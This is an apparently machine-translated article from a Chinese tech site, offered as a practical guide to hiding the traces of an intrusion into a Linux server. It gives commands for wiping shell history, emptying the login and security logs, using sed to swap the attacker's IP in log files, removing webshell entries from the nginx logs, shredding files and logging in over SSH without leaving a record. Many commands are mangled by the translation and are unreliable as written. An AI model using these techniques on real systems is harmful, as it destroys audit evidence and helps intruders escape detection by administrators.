Shulou(Shulou.com)05/31 Report--

This article mainly explains "how to clean up the traces of Linux invasion". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to clean up the traces of Linux invasion.

01. Clear the history historical command record

The first way:

(1) Edit the history record file and delete some history commands that you do not want to be saved.

Vim / .bash_history

(2) clear the history command record of the current user

History-c

The second way:

(1) use the vim feature to delete history commands

# use vim to open a file vi test.txt # set vim not to record commands, Vim will save the command history in the viminfo file. Set history=0 # opens the command record file .bash _ history with the split screen function of vim, and edits the file deletion history operation command vsp ~ / .bash_history # to clear and save the .bash file.

(2) execute orders in vim that you do not want others to see

: set history=0:! command

The third way:

By modifying the configuration file / etc/profile, the system no longer saves the command record.

HISTSIZE=0

The fourth way:

After logging in, execute the following command without recording the history command (.bash _ history)

Unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

02. Clear traces of the system log

There are many kinds of log files in Linux system to record the logs generated during the operation of the system.

/ var/log/btmp records all login failures, uses the lastb command to view / var/log/lastlog logs of the last login time of all users in the system, uses the lastlog command to view / var/log/wtmp to record the login and logout information of all users, and uses the last command to view / var/log/utmp to record the information of users who are currently logged in. View / var/log/secure security-related log information / var/log/message record system startup messages and error logs using commands such as wwow who users

The first way: clear the log file

Clear the record of failed login to the system:

[root@centos] # echo > / var/log/btmp [root@centos] # lastb / / failed to query login failure information

Clear the record of successful login to the system:

[root@centos] # echo > / var/log/wtmp [root@centos] # last / / cannot query the information about successful login

Clear the relevant log information:

Clear the last login time of the user: echo > / var/log/lastlog # lastlog command to clear the information of the currently logged-in user: echo > / var/log/utmp # clear the security log record using the command such as wdepartment whodepartment users: cat / dev/null > / var/log/secure clear system log record: cat / dev/null > / var/log/message

The second way: delete / replace part of the log

The log files are all emptied, which is too easy for administrators to detect, and if you only delete or replace some of the key log information, you can perfectly hide the attack traces.

# Delete all lines that match to a string, such as replacing the login IP address globally with the current date or your own login ip sed-I'/ your own ip/'d / var/log/messages #: sed-I's Universe 192.168.166.85 Universe 192.168.1.1 G'secure

03. Clear traces of web invasion

The first way: directly replace the log IP address

Sed-I's access.log 192.168.166.85, 192.168.1.1

The second way: clear some related logs

# use grep-v to delete our related information, cat / var/log/nginx/access.log | grep-v evil.php > tmp.log # overwrite the modified log to the original log file cat tmp.log > / var/log/nginx/access.log/

04. File Security deletion tool

(1) shred command

To achieve the security of erasing data from the hard disk, overwrite 3 times by default, and specify the number of data overrides by-n.

[root@centos] # shred-f-u-z-v-n 8 1.txt shred: 1.txt: pass 1 go 9 (random). Shred: 1.txt: pass 2 Compact 9 (ffffff)... Shred: 1.txt: pass 3gam9 (aaaaaa). Shred: 1.txt: pass 4 Compact 9 (random)... Shred: 1.txt: pass 5 Compact 9 (000000)... Shred: 1.txt: pass 6gam9 (random). Shred: 1.txt: pass 7 Compact 9 (555555)... Shred: 1.txt: pass 8 Compact 9 (random)... Shred: 1.txt: pass 9 Compact 9 (000000)... Shred: 1.txt: removing shred: 1.txt: renamed to 00000 shred: 00000: renamed to 0000 shred: 0000: renamed to 000 shred: 000: renamed to 00 shred: 00: renamed to 0 shred: 1.txt: removed

(2) dd command

Can be used to safely clear the contents of a hard disk or partition.

Dd if=/dev/zero of= the size of the file bs= to delete the number of count= writes

(3) wipe

Wipe uses a special mode to write files repeatedly, safely erasing files from magnetic media.

Wipe filename

(4) Secure-Delete

Secure-Delete is a collection of tools that provide srm, smem, sfill, and sswap,4 command-line tools for safely deleting files.

Srm filename sfill filename sswap / dev/sda1 smem

05. Hide remote SSH login records

Stealth login system will not be detected by w, who, last and other instructions.

Ssh-T root@192.168.0.1 / bin/bash-I

Do not record the ssh public key in the local .ssh directory

Ssh-o UserKnownHostsFile=/dev/null-T user@host / bin/bash-I so far, I believe you have a deeper understanding of "how to clean up Linux intrusion traces". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.